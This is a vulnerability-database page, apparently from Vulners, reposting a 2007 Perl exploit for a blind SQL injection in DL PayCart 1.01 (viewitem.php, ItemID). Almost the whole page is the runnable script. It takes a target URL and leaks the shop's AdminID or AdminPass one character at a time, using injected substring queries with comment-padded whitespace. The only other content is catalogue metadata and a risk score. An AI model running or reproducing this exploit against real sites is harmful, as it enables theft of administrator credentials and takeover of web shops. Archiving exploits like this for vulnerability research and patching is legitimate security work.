Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit

🗓️ 28 Aug 2007 00:00:00Reported by irvianType 
zdt
 zdt🔗 0day.today👁 29 Views

DL PayCart 1.01 Blind SQL Injection Exploi

Show more
Code
=================================================================
DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit
=================================================================



#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts       : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site  : http://www.dinkumsoft.com/
# Thanks To
# bot        : sqlscan, hantu_internet, xcart
# chanell    : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend     : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
if (@ARGV < 2){
die "
use      : $0 host option
example  : $0 http://victim.com 1

1= AdminID
2= AdminPass\n";}


$url = $ARGV[0];
$option = $ARGV[1];


print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection                [+]\r\n";
print "[+]DL PayCart 1.01 - (c) 2006            [+]\r\n";
print "[+]code by irvian                    [+]\r\n";
print "[+]special To : ifx, arioo, jipank        [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";

if ($option eq 1){
syswrite(STDOUT, "AdminID: ", 9);}
elsif ($option eq 2){
syswrite(STDOUT, "AdminPass: ", 11);}

for($i = 1; $i <= 32; $i++){
 $f = 0;
 $n = 32;
 while(!$f && $n <= 255)
 {
  if(&blind($url, $option, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}
}

print "\n[+]finish Execution Exploit\n";



sub blind {
my $site = $_[0];
my $op = $_[1];
my $az = $_[2];
my $na = $_[3];

if ($op eq 1){$klm = "AdminID";}
elsif ($op eq 2){$klm = "AdminPass";}

$blind = "$site"."/viewitem.php?ItemID=1'/**/and/**/substring((select/**/"."$klm"."/**/from/**/pc_settings/**/limit/**/0,1),"."$az".",1)=char("."$na".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;

if ($res !~ /noimage.gif/i){
    return 1;
}

}



#  0day.today [2018-01-08]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Aug 2007 00:00Current
7.1High risk
Vulners AI Score7.1
dinkumsoftsql injectionperlhttp requestlwp::useragent
29
.json
Report